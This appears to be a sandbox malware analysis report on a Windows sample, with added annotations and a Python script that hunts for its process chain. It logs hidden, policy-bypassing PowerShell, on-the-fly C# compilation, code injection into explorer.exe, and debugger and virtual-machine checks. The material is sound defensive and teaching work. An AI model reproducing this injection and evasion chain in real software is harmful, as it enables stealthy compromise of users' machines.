Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic file information: File size 8467456 > 1048576
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x794400
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: vp)[C:\Users\kenba\source\repos\dResult\x64\Release\dResult.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: explorer.exe, explorer.exe, 0000000B.00000002.3353156296.00000000297B0000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3351484590.0000000020D39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2175693198.0000000010630000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3352354318.00000000290B9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3354872817.000000002A5BB000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\kenba\source\repos\dResult\x64\Release\dResult.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe
                      Source: Binary string: C:\Users\kenba\source\repos\dResult\x64\Release\winInfo.pdb source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe, 00000000.00000002.2315556372.00007FF8A880A000.00000002.00000001.01000000.00000004.sdmp, winApps.dll.0.dr
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe  Static PE information: section name: .gxfg
                      Source: SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe  Static PE information: section name: .gehcont
                      Source: winApps.dll.0.dr  Static PE information: section name: .gxfg
                      Source: winApps.dll.0.dr  Static PE information: section name: .gehcont
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe  File created: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  File created: C:\Users\user\AppData\Local\Temp\spoxiyrj.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  File created: C:\Users\user\AppData\Local\Temp\iczy5vwk.dll
                      Source: C:\Windows\System32\WerFault.exe  Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 entries; the value is 2^63-1 100-ns ticks expressed in milliseconds, i.e. an effectively unbounded wait)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4655
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5226
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 879
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 872
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4886
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4910
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winApps.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\spoxiyrj.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iczy5vwk.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044 | Thread sleep count: 4886 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5044 | Thread sleep count: 4910 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160 | Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 entries)

Virtualization artefacts in memory. All of the following strings were read from explorer.exe memory dumps (process index 0000000B), i.e. from the shell process the sample injects into. They document the VMware / Hyper-V analysis host as the shell itself sees it (storage device IDs, BIOS vendor strings) and are not by themselves evidence that the sample queried them.
Source: explorer.exe, 0000000B.00000000.2164458233.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} (same string reported three times from this dump with differing trailing bytes)
Source: explorer.exe, 0000000B.00000002.3343227530.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3094867488.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
Source: explorer.exe, 0000000B.00000002.3343227530.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: explorer.exe, 0000000B.00000003.3097682652.000000000354B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000B.00000003.3097682652.000000000354B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 0000000B.00000000.2162912358.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 0000000B.00000000.2164458233.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 0000000B.00000003.3094867488.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3343227530.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000B.00000003.3097682652.000000000354B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 0000000B.00000003.3097682652.000000000354B000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware,p
Source: explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 0000000B.00000000.2162912358.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000B.00000002.3343227530.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000002.3340185941.0000000007699000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Process queried: DebugPort (2 entries; NtQueryInformationProcess(ProcessDebugPort) is the classic "am I being debugged" check)
Source: C:\Windows\explorer.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1" (3 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 10630000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: unknown EIP: 29EB0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 1028 base: 10630000 value: 48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 1028 base: 29EB0000 value: 48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 10630000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 29EB0000
Note: the write targets (PID 1028, explorer.exe) and the remote-thread entry points (EIP 10630000 and 29EB0000) are the same addresses, so the written buffer is executed directly as the thread start routine. The first byte 0x48 is the REX.W prefix that opens much x64 code (e.g. sub rsp, imm8), which is consistent with a raw code buffer rather than a DLL path.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC35E.tmp" "c:\Users\user\AppData\Local\Temp\CSCD0EB64BB52C94309A29EE6B778E205.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\spoxiyrj.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDA71.tmp" "c:\Users\user\AppData\Local\Temp\CSC30DB8E40DC954A908A17CE354256952F.TMP"
Note: the csc.exe / cvtres.exe pair with a random eight-character .cmdline response file in %TEMP% is the footprint of PowerShell's Add-Type compiling C# on the fly; the resulting iczy5vwk.dll and spoxiyrj.dll are the compiled P/Invoke stubs PowerShell then uses for the memory writes and thread creation above.
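The chain in this section is worth correlating as a whole rather than alerting on any one line: wscript.exe launches a hidden, policy-bypassing PowerShell script from the user's WindowsApps folder, PowerShell compiles C# through csc.exe from a .cmdline response file in %TEMP%, and PowerShell then writes into explorer.exe and starts a thread there. The Python below is an added hunting example, not code from this report, from Joe Sandbox or from the sample. The Sysmon-style event records, the PIDs and the benign control event are constructed to mirror the report's lines; only the field names (EventID 1 process create, EventID 8 CreateRemoteThread) follow Sysmon's real schema.

```python
import re

# Constructed Sysmon-style events modelled on this report's process chain
# (EventID 1 = process create, EventID 8 = CreateRemoteThread). Synthetic
# records with made-up PIDs, not telemetry from the sandbox run; the last
# record is a benign control (admin running a script from cmd.exe).
EVENTS = [
    {"EventID": 1, "ProcessId": 3300, "ParentProcessId": 1028,
     "Image": r"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe"'},
    {"EventID": 1, "ProcessId": 6120, "ParentProcessId": 3300,
     "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe",
     "CommandLine": r'wscript.exe "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.vbs"'},
    {"EventID": 1, "ProcessId": 2228, "ParentProcessId": 6120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden '
                    r'-ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\WindowsApps\app.ps1"'},
    {"EventID": 1, "ProcessId": 7044, "ParentProcessId": 2228,
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
                    r'@"C:\Users\user\AppData\Local\Temp\iczy5vwk.cmdline"'},
    {"EventID": 8, "SourceProcessId": 2228, "TargetProcessId": 1028,
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartAddress": "0x10630000"},
    {"EventID": 1, "ProcessId": 9001, "ParentProcessId": 9000,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts unambiguous prefixes, so match -ep/-ex/-exec/-executionpolicy
# and -w/-win/-windowstyle rather than the full switch names only.
BYPASS = re.compile(r"-(?:ep|ex[a-z]*)\s+bypass", re.I)
HIDDEN = re.compile(r"-w[a-z]*\s+hidden", re.I)
SCRIPT_FILE = re.compile(r'-f(?:ile)?\s+"?([^"]+\.ps1)', re.I)
CSC_RESPONSE = re.compile(r'@"?([^"\s]+\.cmdline)', re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\|\\programdata\\|\\temp\\", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid, by_pid, limit=8):
    """Image names from pid up the parent chain, using EventID 1 records only."""
    chain = []
    while pid in by_pid and len(chain) < limit:
        ev = by_pid[pid]
        chain.append(basename(ev["Image"]))
        pid = ev["ParentProcessId"]
    return chain


def analyze(events):
    """Return (rule, pid, detail) findings for the wscript -> powershell -> csc
    chain and for PowerShell starting a thread inside explorer.exe."""
    by_pid = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        if e["EventID"] == 1:
            image, cmd, parent = basename(e["Image"]), e["CommandLine"], basename(e["ParentImage"])
            if image in POWERSHELL:
                reasons = []
                if parent in SCRIPT_HOSTS:
                    reasons.append(f"spawned by {parent}")
                if BYPASS.search(cmd):
                    reasons.append("execution policy bypass")
                if HIDDEN.search(cmd):
                    reasons.append("hidden window")
                m = SCRIPT_FILE.search(cmd)
                if m and USER_WRITABLE.search(m.group(1)):
                    reasons.append("script in user-writable path")
                if len(reasons) >= 2:  # a lone -File from an interactive shell is normal admin use
                    findings.append(("suspicious_powershell", e["ProcessId"], "; ".join(reasons)))
            elif image == "csc.exe" and parent in POWERSHELL:
                m = CSC_RESPONSE.search(cmd)
                if m and USER_WRITABLE.search(m.group(1)):  # Add-Type compile from %TEMP%
                    findings.append(("dynamic_compile", e["ProcessId"],
                                     " <- ".join(ancestry(e["ProcessId"], by_pid))))
        elif e["EventID"] == 8:
            src, dst = basename(e["SourceImage"]), basename(e["TargetImage"])
            if src in POWERSHELL and dst == "explorer.exe":
                findings.append(("remote_thread_into_explorer", e["SourceProcessId"],
                                 f"start address {e['StartAddress']} in {dst}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyze(EVENTS):
        print(f"{rule:28s} pid={pid:<6d} {detail}")
```

The PowerShell rule deliberately needs two independent reasons before it fires, so that an administrator running `powershell -File` from an interactive cmd.exe (the control record) stays quiet while the wscript-launched, hidden, bypassing script from AppData is reported. The csc.exe rule walks the parent chain so the alert carries the full wscript -> powershell -> csc lineage instead of a bare compiler event.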
Window class names in explorer.exe memory. Shell_TrayWnd and Progman are the window classes of the taskbar and the desktop, both owned by explorer.exe; FindWindow on one of them followed by GetWindowThreadProcessId is a common way to locate the shell's PID before injecting into it. Here the strings are read from explorer.exe's own memory, so they identify the injection target rather than show the sample's lookup.
Source: explorer.exe, 0000000B.00000002.3343227530.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3096126515.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2166532300.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 0000000B.00000000.2163273317.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3336566903.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 0000000B.00000002.3339851443.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2163273317.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3336566903.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.2163273317.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3336566903.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.2163273317.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3336566903.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.2162912358.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3335335583.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman

Volume information queries (entries from the PowerShell processes, duplicates merged):
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (14 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (2 entries)
Note: the catalog and GAC assembly lookups are what the .NET loader does when verifying signatures and resolving assemblies; the query against C:\ itself is the one that returns the volume serial number commonly used for host fingerprinting.

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.9625.14443.exe | Code function: 0_2_00007FF77ACEC9EC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF77ACEC9EC
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK matrix (flattened by extraction; the cells below are listed row by row under these 14 tactic columns): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
